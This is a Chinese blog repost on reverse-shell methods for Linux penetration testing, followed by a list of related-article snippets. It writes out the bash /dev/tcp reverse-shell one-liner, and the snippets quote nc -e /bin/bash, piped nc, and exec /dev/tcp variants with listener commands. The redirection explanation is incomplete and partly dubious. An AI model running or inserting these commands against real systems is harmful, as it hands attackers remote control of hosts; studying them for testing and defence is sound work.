linux几种方式来弹哥shell

最新推荐文章于 2024-08-08 21:06:47 发布
最新推荐文章于 2024-08-08 21:06:47 发布
阅读量126 收藏
点赞数
文章标签: shell 网络 c/c++
原文链接:http://www.cnblogs.com/EEEE1/p/9245107.html
版权

渗透测试linux主机的时候,能够去 弹个shell进行交互是非常重要的

 

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1


bash -i :打开一个交互的bash。
dev/tcp/是linux中的一个设备,打开文件相当于发出一个socket调用,建立socket连接。
打开这个文件相当于 在这个socket里面传输数据,

当然, 还有一个文件夹叫 /dev/udp/

在了解“>&”和“0>&1”,前,先了解一下linux文件描述符和重定向。

linux shell下常用的文件描述符是:

1.  标准输入   (stdin) :代码为 0 ,使用 < 或 << ; 

2.  标准输出   (stdout):代码为 1 ,使用 > 或 >> ; 

3.  标准错误输出(stderr):代码为 2 ,使用 2> 或 2>>。

 

先从 0>&1入手,简简单单的四个字符,但是想真正的搞清楚真的麻烦啊

 

有些资料里的解释说:2>&1是将标准错误输出合并到标准输出中

也就是说  2> ==  标准错误输出

      1   ==  标准输入

那难道 &是合并的意思?  &貌似也有 and的意思对吧。

其实&根本就不是and的意思,学过C/C++的都知道,在这两门语言里,&是取地址符。在这里,我们也可以将它理解为取地址符。

 

http://blog.51cto.com/kusorz/2071052

转载于:https://www.cnblogs.com/EEEE1/p/9245107.html

weixin_30266829
关注
内网渗透-常用反弹shell方法总结
lza20001103的博客
08-28 4756
常用反弹shell方法总结 文章目录常用反弹shell方法总结前言bash反弹shellnc反弹shell1.nc弹linuxshell: nc -e /bin/bash 1.1.1.1 99992. 如果linux中nc没有-e参数3.nc 弹windows下的shell:whois 反弹shell常见脚本反弹1.python2.phppowercat反弹shellmsf反弹shell 前言 bash反弹shell bash -i >&/dev/tcp/1.1.1.1/9999 0&gt
Shell中整数计算的几种方式
01-20
Shell中可以使用下列方式来做整数的计算(+,-,*,/) 方式一: linux:~ # A=1 linux:~ # B=2 linux:~ # C=$(($A+$B)) linux:~ # echo $C 3 方式二: linux:~ # A=1 linux:~ # B=2 linux:~ # C=$[$A + $B] linux:~ # ...
反弹shell汇总(超详细)
人无名,便可潜心练剑。
05-27 9875
反弹shell姿势大全,看这一篇就够啦~
反弹shell方法汇总
2301_76786857的博客
01-10 1991
reverse shell(反弹shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。
常见 反弹shell的方法
最新发布
qq_48368964的博客
08-08 1383
nc x.x.x.x 4444|/bin/bash|nc x.x.x.x 5555 #从4444端口获取到命令,bash 运行后将命令执行结果返回 5555 端口,攻击者主机上也是打开两个终端分别执行监听。#/dev/tcp/x.x.x.x/port 意为调用socket,建立socket连接,其中x.x.x.x为要反弹到的主机ip,port为端口。反弹shell成功后,在监听4444端口的终端中执行命令可以在另一个终端中看到命令执行结果。监听两个端口分别用来输入和输出,其中x.x.x.x均为攻击者ip。
常见的反弹shell的方法以及对反弹shell的解释
热门推荐
qq_45584159的博客
03-04 1万+
文章目录一.什么是反弹shell,以及对反弹shell作用原理的解析:3.反弹shell的本质linux文件描述符重定向输入重定向输出重定向标准输出与标准错误输出重定向文件描述符的复制exec 绑定重定向对反弹shell执行的实例分析:>&、&>常见linux提权 一.什么是反弹shell,以及对反弹shell作用原理的解析: 1.定义 通俗来说,shell就是实现用户命令的接口,通过该接口我们能实现对计算机的控制(root权限), 而反弹shell就是将shell反弹给攻击者
Linux下挂载硬盘分区的几种方法
09-16
Linux下挂载硬盘分区的几种方法 Linux系统中挂载硬盘分区有多种方法,本文将介绍其中的三种:使用Autofs自动挂载分区、修改/etc/fstab文件和编写shell脚本自动挂载分区。 方法一:使用Autofs自动挂载分区 Autofs...
linux shell实现随机数几种方法分享(date,random,uuid)
09-15
Linux Shell编程中,生成随机数是常见的需求,特别是在自动化脚本、测试或者安全相关的应用中。本文将介绍三种在Shell中生成随机数的方法:基于日期的随机数、使用内置的 `$RANDOM` 变量以及利用 `/dev/random` 和...
LinuxShell脚本中几种基本命令的替换区别
09-15
Linux Shell脚本编程中,理解不同命令替换方式的区别至关重要,因为它们直接影响脚本的执行逻辑和效率。这里我们将深入探讨几种常见的命令替换形式:`command`、`$(command)`、`${command}`以及`$(){command}`。 ...
linux_shell实例精解
05-24
"Linux Shell实例精解"这本书籍通过实例的方式,让读者在实践中学习和掌握Shell编程,对于想要提升Linux操作技能或自动化工作流程的人来说,是一份非常有价值的参考资料。通过阅读这本书,不仅可以学会基本的Shell...
windows反弹主机_反弹shell的N种姿势
weixin_28907247的博客
01-31 921
0x00 前言在渗透测试的过程中,在拿到webshell以后,如果目标主机是Windows主机,则是通过开3389端口在远程连接,如果目标主机是linux服务器,一般我们都会选择反弹shell来进行操作。在这里总结下反弹shell常见的几种姿势。0x01 Bash反弹1.1 方法一攻击者主机上执行监听:nc -lvvp port目标主机上执行:bash -i >& /dev...
内网渗透-反弹shell的N种姿势
lza20001103的博客
04-15 1483
内网渗透-反弹shell的N种姿势
反弹shell学习(一):基础反弹姿势
E1even的博客
07-25 2165
文章目录bash反弹:nc反弹:-e被阉割的情况:nc -e:利用Telnet反弹shell方法1:方法2:python脚本反弹:PHP反弹shell总结: bash反弹: 这是最常见也是最简单的一种反弹shell方式,直接看命令: 攻击机:nc -lvp 2333 受害机:bash -i >& /dev/tcp/192.168.28.133/2333 0>&1 攻击机: 受害机: 最后攻击机达成的效果: 可以命令执行,再实际中不可能获取的是root权限,所以成功反弹s
shell的多种姿势小记
sash1mi
11-13 394
shell的多种姿势小记 在渗透测试的过程中,当拿到webshell以后,如果目标主机是Windows主机,则是通过开3389端口在远程连接。如果目标主机是linux服务器,一般会选择反弹shell来进行操作,在这里简单总结下反弹shell常见的几种姿势。 01、 exec 0&0 2>&0 0<&196;exec 196<>/dev/tcp/your ip/port; sh <&196 >&196 2>&196
linux弹窗指令_linux下使用命令行弹出对话框和消息框
weixin_34584899的博客
01-17 7574
在服务器上的用户都是用shell来登陆的,所以发送消息使用write,wall 就很方便了。但是对于很多使用linux桌面版(例如ubuntu)的用户来说,大多数情况下使用的是桌面环境,不会开shell。这时要给其它用户发送消息就无法通过shell命令了,只能用弹窗消息来实现了,这里两种方式都介绍下。一.shell下给其它用户发送消息1.使用wall给所有用户发送消息1wall2.给某一用户发送消...
反弹Shell方式和详解
Kevin's Blog
06-18 1万+
文章目录一、介绍1.1 含义1.2 目的二、反弹方式2.1 Bash反弹shell2.1.1 适用对象2.1.2 操作方法2.1.3 命令原理 声明:以下的反弹shell的介绍只适用于学习和授权情况下的操作,请勿用于非法环境! 一、介绍 1.1 含义   攻击者所在机器连接目标机器为正向连接(如:远程桌面、ssh等),反向连接弹shell(反弹shell为攻击者为服务端,受害者主机主动连接攻击者的服务端程序) 1.2 目的 攻击了一台主机需要在自己的机器上交互式地执行目标机器中的cmd/bash命令
windows 反弹shell_怎么反弹shell(reverse shell
weixin_39956451的博客
11-19 2184
在我们渗透测试的过程中,最常用的就是基于tcp/udp协议反弹一个shell,也就是反向连接。我们先来讲一下什么是正向连接和反向连接。正向连接:我们本机去连接目标机器,比如ssh和mstsc反向连接:目标机器去连接我们本机那么为什么反向连接会比较常用呢目标机器处在局域网内,我们正向连不上他目标机器是动态ip目标机器存在防火墙然后说一下我的实验环境虚拟机采用nat模式攻击机:Kali Linux :...
怎么弹出shell
qq_43649282的博客
08-30 128
py登录linux系统的几种方式
06-10
有以下几种登录 Linux 系统的方式: 1. 命令行登录:使用 SSH(Secure Shell)协议,通过终端连接到远程 Linux 服务器。在命令行窗口输入用户名和密码即可登录。 2. 图形界面登录:如果 Linux 系统有图形界面,可以使用登录窗口输入用户名和密码登录。 3. 公钥登录:通过生成公钥和私钥,将公钥传输到服务器上,然后使用私钥进行登录。 4. 免密码登录:在公钥登录的基础上,使用 SSH Agent 将私钥添加到缓存中,可以实现免密码登录。 5. PAM 模块:使用 PAM(Pluggable Authentication Modules)模块,可以实现多种认证方式,包括密码、指纹、智能卡等。 需要注意的是,登录 Linux 系统时要确保输入的用户名和密码正确,否则无法登录。同时,为了保障系统的安全性,应该定期更换密码,并避免使用弱密码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值